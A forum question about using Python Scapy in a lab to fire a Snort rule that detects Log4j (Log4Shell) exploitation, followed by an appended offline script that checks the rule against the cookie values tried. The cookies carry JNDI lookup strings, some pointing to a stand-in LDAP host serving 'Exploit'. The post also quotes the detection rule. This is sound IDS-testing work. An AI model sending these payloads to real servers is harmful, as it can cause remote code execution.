Correctly setting the cookie of an HTTP request with Scapy

Question (votes: 0, answers: 0)

I am trying to trigger a Snort 3 IDS rule using the Python Scapy 2.5 library. The rule expects to see a specific HTTP cookie value. When testing, the HTTP request is sent to an HTTP listener that sits behind Snort. I get a 200 response back from the listener, but the rule does not fire. This is being done in a virtual lab environment.

Here is the Python code that generates the request; you can see that I tried several values in an attempt to match the rule's regular expression:

import logging
import socket
from scapy.all import *
from scapy.layers.http import HTTPRequest

# Silence Scapy's runtime warnings (e.g. missing routes) so only the response is printed
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

target_ip = "192.168.208.167"
target_port = 80

# The cookie value to trigger the Snort rule with sid 58726 and rev 6
cookie_name = "jndi"
cookie_value = "%24%7Bjndi%3A"
#cookie_value = "${jndi:"
#cookie_value = 'test%24%7Bjndi%3Aldap%3A//test.example.com%3A389/Exploit%7D'
#cookie_value = "%24%7Bjndi%3Aldap%3A%2F%2Ftest.example.com%3A389%2FExploit%7D"

def send_request(cookie_name, cookie_value):
    # Build the request with Scapy's HTTP layer; header fields are plain bytes
    http_request = HTTPRequest(
        Method=b"GET",
        Path=b"/",
        Host=bytes(target_ip, encoding="utf-8"),
        User_Agent=b"Mozilla/5.0",
        Accept=b"*/*",
        Connection=b"keep-alive",
        Cookie=f"{cookie_name}={cookie_value}"
    )

    # Serialise the layer to the raw bytes that go on the wire
    http_request_raw = raw(http_request)

    # Send over a normal TCP socket so the kernel handles the handshake
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))

    sock.sendall(http_request_raw)
    response = sock.recv(4096)

    sock.close()
    print(response)
    # Note: printed unconditionally; it does not confirm that Snort actually alerted
    print("Triggered Snort rule with sid: 58726, rev: 6")

send_request(cookie_name, cookie_value)

Here is the Snort rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-OTHER Apache Log4j logging remote code execution attempt"; flow:to_server,established; content:"jndi",fast_pattern,nocase; http_cookie; content:"jndi",nocase; pcre:"/(%(25)?24|\x24)(%(25)?7b|\x7b)jndi(%(25)?3a|\x3a)/i"; metadata:policy balanced-ips drop,policy connectivity-ips drop,policy max-detect-ips drop,policy security-ips drop,ruleset community; service:http; reference:cve,2021-44228; reference:cve,2021-44832; reference:cve,2021-45046; reference:cve,2021-45105; classtype:attempted-user; sid:58726; rev:6; )

Here is the HTTP stream as seen in Wireshark:

GET / HTTP/1.1
Accept: */*
Connection: keep-alive
Cookie: jndi=%24%7Bjndi%3A
Host: 192.168.208.167
User-Agent: Mozilla/5.0

HTTP/1.1 200 OK
Date: Tue, 09 May 2023 14:03:44 GMT
Content-Type: text/html
Content-Length: 258
Connection: Close
Server: INetSim HTTP Server

<html>
  <head>
    <title>INetSim default HTML page</title>
  </head>
  <body>
    <p></p>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>
  </body>
</html>

Any thoughts on why the request is not triggering the Snort rule?

python cookies scapy snort
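As an added illustration that is not part of the question or written by its author: the Python below re-implements only the cookie-related detection options of the quoted rule (the two `content:"jndi"` tests and the PCRE) and runs them over the four cookie values tried above, once against the raw header and once after a single percent-decode as an approximation of a normalized `http_cookie` buffer (an assumption about the inspector, not something the page states). It shows whether the regex itself rejects any of the values; flow state, port variables and policy settings are not modelled.

```python
"""Offline check of the cookie-matching options of Snort rule sid 58726 rev 6.
This is not Snort: it mirrors only the content/pcre tests from the rule text."""
import re
from typing import Optional
from urllib.parse import unquote

# PCRE copied verbatim from the rule; Python's re accepts this subset (\xHH, (..)?, |, /i).
RULE_PCRE = re.compile(r"(%(25)?24|\x24)(%(25)?7b|\x7b)jndi(%(25)?3a|\x3a)", re.IGNORECASE)


def cookie_header_value(request: bytes) -> Optional[str]:
    """Return the Cookie header value of a raw HTTP/1.1 request, or None if absent."""
    head = request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "cookie":
            return value.strip()
    return None


def rule_58726_cookie_checks(request: bytes, normalize: bool = True) -> dict:
    """Evaluate the rule's detection options against one request.
    normalize=True percent-decodes the cookie once (assumed approximation of a
    normalized http_cookie buffer); normalize=False tests the raw header value."""
    cookie = cookie_header_value(request)
    if cookie is None:
        return {"cookie": None, "pkt_content": False, "cookie_content": False,
                "pcre": False, "alert": False}
    buf = unquote(cookie) if normalize else cookie
    pkt_content = b"jndi" in request.lower()     # content:"jndi",fast_pattern,nocase (pkt_data)
    cookie_content = "jndi" in buf.lower()       # http_cookie; content:"jndi",nocase
    pcre = RULE_PCRE.search(buf) is not None     # pcre applied to the same cookie buffer
    return {"cookie": cookie, "pkt_content": pkt_content, "cookie_content": cookie_content,
            "pcre": pcre, "alert": pkt_content and cookie_content and pcre}


def build_request(cookie_value: str, host: str = "192.168.208.167") -> bytes:
    """Constructed request mirroring the header order of the Wireshark capture above."""
    return (f"GET / HTTP/1.1\r\nAccept: */*\r\nConnection: keep-alive\r\n"
            f"Cookie: jndi={cookie_value}\r\nHost: {host}\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
            ).encode("ascii")


# The four candidate values from the question (constructed test input, not live traffic).
CANDIDATES = [
    "%24%7Bjndi%3A",
    "${jndi:",
    "test%24%7Bjndi%3Aldap%3A//test.example.com%3A389/Exploit%7D",
    "%24%7Bjndi%3Aldap%3A%2F%2Ftest.example.com%3A389%2FExploit%7D",
]

if __name__ == "__main__":
    for value in CANDIDATES:
        for norm in (False, True):
            result = rule_58726_cookie_checks(build_request(value), normalize=norm)
            print(f"normalize={norm!s:5} alert={result['alert']!s:5} {value}")
```

All four values satisfy the rule's content and PCRE options in both forms, so the investigation should move from the regex to the options this script does not model (flow, `$HOME_NET`/`$HTTP_PORTS`, policy state of the rule).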